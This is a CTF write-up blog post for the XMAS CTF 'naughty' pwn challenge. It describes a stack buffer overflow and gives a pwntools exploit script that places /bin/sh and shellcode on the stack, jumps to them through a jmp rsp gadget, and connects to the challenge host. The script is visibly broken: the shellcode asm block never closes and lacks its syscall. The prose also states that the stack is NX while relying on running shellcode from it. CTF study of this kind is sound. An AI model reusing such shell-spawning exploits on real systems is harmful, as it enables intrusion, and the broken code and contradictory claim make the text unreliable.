
pwn notes from an exploit dev wannabe

Home CTF Writeups

XMAS CTF: naughty [pwn]

Standard buffer overflow which we can overwrite the return pointer, the catch is that we only have little control after taking program execution since we are only allowed a short amount of user input.

We won’t be able to perform a ropchain or get a leak, but we can execute shellcode since the stack is NX. My plan was to place the ‘/bin/sh’ string and shellcode onto the stack then return to a gadget which jumps to the stack. Since I had no idea where the addresses where (but knew that stack offsets remained the same), I calculated the offset differences and made appropriate shellcode for it. The reason why I placed the /bin/sh string onto the stack earlier is because pushing values during the execution of our shellcode will affect the stack and fail to execute the next bytes of the shellcode.

from pwn import *

context.arch = 'amd64'
#p = process('./chall')
p = remote("challs.xmas.htsp.ro", 2000)
breakpoints = ['set disable-randomization off', 'break *0x4006b1']
#gdb.attach(p, gdbscript = '\n'.join(breakpoints))

#: Exploit code here
jump_rsp = 0x000000000040067f

shellcode = asm('''

	xor rsi, rsi
	xor rdx, rdx
	xor rax, rax
	lea rdi, [rsp-8]
	mov al, 0x3b

exploit = '/bin/sh\x00'
exploit += shellcode
exploit += '\xcc' * (46 - len(exploit))
exploit += p64(0xe4ff)
exploit += cyclic(2)
exploit += p64(jump_rsp)

#: sub rsp, 0x38
#: jmp rsp
exploit += "\x48\x83\xEC\x38\xFF\xE4" #: jmp to shellcode
